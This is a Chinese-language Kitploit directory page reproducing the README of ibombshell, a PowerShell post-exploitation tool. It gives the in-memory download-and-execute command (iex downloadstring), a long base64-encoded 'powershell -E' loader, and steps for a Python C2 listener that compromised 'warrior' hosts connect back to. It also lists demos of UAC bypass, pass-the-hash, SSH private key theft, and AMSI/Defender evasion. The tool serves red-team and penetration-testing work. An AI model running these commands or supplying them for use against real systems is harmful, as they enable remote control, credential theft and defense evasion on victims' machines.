Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ibombshell — 随时部署后渗透提示的工具 | Kitploit
工具/GitHubGitHub/telefonica/ibombshell
权限提升Payload生成IDS/IPS规避后渗透利用渗透测试命令与控制红队远程访问工具
GitHubtelefonica/ibombshell

ibombshell

随时部署后渗透提示的工具

查看仓库
3217135年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Supported Python versions License

ibombshell - 动态远程Shell

root@kitploit:~
      ,--.!,    _ ____                  __   _____ __         ____
   __/   -*-   (_) __ )____  ____ ___  / /_ / ___// /_  ___  / / /
 ,d08b.  '|`  / / __  / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /
 0088MM      / / /_/ / /_/ / / / / / / /_/ /__/ / / /  __/ / /
 `9MMP'     /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/

 [+] 启动控制台...
 [*] 控制台就绪!

ibombshell 是一款使用 PowerShell 编写的工具,可让你随时拥有一个具备后渗透功能(某些情况下还具备利用功能)的提示符。它是一个直接下载到内存中的 Shell,提供大量渗透测试功能。这些功能可以以 PowerShell 函数的形式直接下载到内存中。这种执行方式被称为 everywhere。

此外,ibombshell 还提供了第二种执行模式,称为 Silently(静默模式),允许渗透测试员执行一个 ibombshell 实例(称为 warrior)。受入侵的计算机将通过 HTTP 连接到一个 C2 面板。因此,可以控制 warrior 并将函数加载到内存中,以辅助渗透测试员。这发生在后渗透阶段。

先决条件

要运行 ibombshell everywhere,必须安装 PowerShell 3.0 或更高版本。对于非 Windows 操作系统,可以在 PowerShell GitHub 上了解更多信息 - PowerShell for every system!。

要运行 ibombshell silently mode,需要 Python 3.6 以及一些 Python 库。可以通过以下方式安装:

root@kitploit:~
cd ibombshell\ c2/
pip install -r requirements.txt

注意:ibombshell C2 需在 python 3.X 上运行。请确保你运行的是与此版本对应的 pip。

用法

ibombshell 有两种执行模式:

ibombshell everywhere

要加载 ibombshell,只需在 PowerShell 中运行:

root@kitploit:~
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)

现在,可以运行下载的 ibombshell 控制台:

root@kitploit:~
console

在隔离环境中使用 ibombshell everywhere

如果需要在隔离环境中使用 ibombshell,必须首先在联网环境中准备好你的计算机。加载所有需要的函数,并使用 savefunctions 将它们保存到 Windows 注册表中。

现在,可以使用以下 base 64 代码获取 ibombshell:

root@kitploit:~
powershell.exe -E "JABwAGEAdABoACAAPQAgACcAaABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAYwBsAGEAcwBzAGUAcwBcAGkAYgBvAG0AYgBzAGgAZQBsAGwAXABjAG8AbgBzAG8AbABlACcAOwAgAHQAcgB5ACAAewAJAGkAZgAoAHQAZQ
BzAHQALQBwAGEAdABoACAAJABwAGEAdABoACkAIAB7ACAAJABjAG8AbgBzAG8AbABlACAAPQAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAcABhAHQAaAApAC4ATgBhAG0AZQA7ACAAYwBkACAAaABrAGMAdQA6
ADsAIAAkAG4AYQBtAGUAIAA9ACAAJABjAG8AbgBzAG8AbABlAC4AcwBwAGwAaQB0ACgAIgBcACIAKQBbAC0AMQBdADsAIAAkAGMAbwBkAGUAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAJABjAG
8AbgBzAG8AbABlACIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAUAByAG8AcABlAHIAdAB5ACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUA
YwB0ACAAewBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcABzAG8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIABAAHsAIgBwAHIAbwBwAGUAcgB0AHkAIgA9ACQAXwA7ACAAIgBWAGEAbAB1AGUAIgAgAD0AIAAoAEcAZQ
B0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAYwBvAG4AcwBvAGwAZQAiACAALQBOAGEAbQBlACAAJABfACkALgAkAF8AfQB9ACkALgBWAGEAbAB1AGUAOwAgACQAYwBvAGQAZQAgAHwAIABv
AHUAdAAtAHMAdAByAGkAbgBnACAAfAAgAGkAZQB4ADsAIABjADoAOwAgAGMAbwBuAHMAbwBsAGUAOwB9AH0AYwBhAHQAYwBoAHsAdwByAGkAdABlAC0AaABvAHMAdAAgACQARQByAHIAbwByAFsAMABdAH0A"

ibombshell silently mode

此版本允许您运行 ibombshell 控制台,并通过 Python 创建的 C2 面板进行远程控制。要运行此版本,首先必须在 PowerShell 中启动控制台进程:

root@kitploit:~
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)

在 ibombshell C2 路径下,准备 C2:

root@kitploit:~
python3 ibombshell.py

并创建 warrior 将连接的监听器:

root@kitploit:~
iBombShell> load modules/listener.py
[+] Loading module...
[+] Module loaded!
iBombShell[modules/listener.py]> run

默认监听端口为 8080。最后,您可以在主机上以静默模式启动控制台以获得远程控制:

root@kitploit:~
console -Silently -uriConsole http://[ip or domain]:[port]

ibombshell C2 架构

ibombshell 控制面板的基本操作遵循以下架构:

root@kitploit:~
        ibombshell                 C2
            |                      |
            |    newibombshell     |
            +--------------------->| --+ 注册
            |                      |<--+ 来自 IP
            |    get functions     |
            |   and instructions   |
            +--------------------->|
            |                      |
            |    send functions    |
            |   and instructions   |
execute +-- |<---------------------+
        +-->|                      |
            |       results        |
            +--------------------->|
            |                      |

Docker

我们创建了一个包含所有必要组件的 Docker 容器,以便其正常运行。从 Dockerfile 所在位置运行以下命令:

root@kitploit:~
sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell

示例视频

一些示例视频...

iBombShell: PoC Warrior + Bypass UAC + Pass the hash

iBombShell: PoC Warrior + Bypass UAC + Pass the hash

iBombShell: macOS

iBombShell: PoC de uso desde macOS

ibombshell: 从 Windows 10 中提取私有 SSH 密钥

ibombshell: Módulo para extracción de claves privadas SSH en Windows 10

iBombShell: PoC savefunctions

iBombShell: PoC savefunctions

ibombshell - 静默绕过 UAC 环境注入

ibombshell - Modo silencioso para el bypass UAC Environment Injection

iBombShell - 模拟受信任目录

iBombShell - Mocking Trusted Directory

iBombShell - DLL 生成

iBombShell - DLL Generation

iBombShell - AMSI 与 Windows Defender 绕过

iBombShell - AMSI & Windows Defender Bypass

许可证

本项目采用 GNU 通用公共许可证授权 - 详情请参见 LICENSE 文件

联系方式

本软件按“原样”提供,不提供任何明示或暗示的担保,包括但不限于对适销性、特定用途适用性和非侵权的保证。在任何情况下,无论基于何种法律理论(合同、侵权或其他),作者或版权持有人均不对因使用本软件或与本软件的使用或其他交易有关的任何索赔、损害或其他责任负责。每当您向包含许可证声明的存储库做出贡献时,您同意在相同条款下许可您的贡献,并确认您有权在此类条款下许可您的贡献。如果您有单独的协议(例如贡献者许可协议)以不同条款许可您的贡献,则该协议将优先适用。

本软件没有 QA 流程。本软件是一个概念验证。

如有任何问题,请联系:

[email protected]

下载工具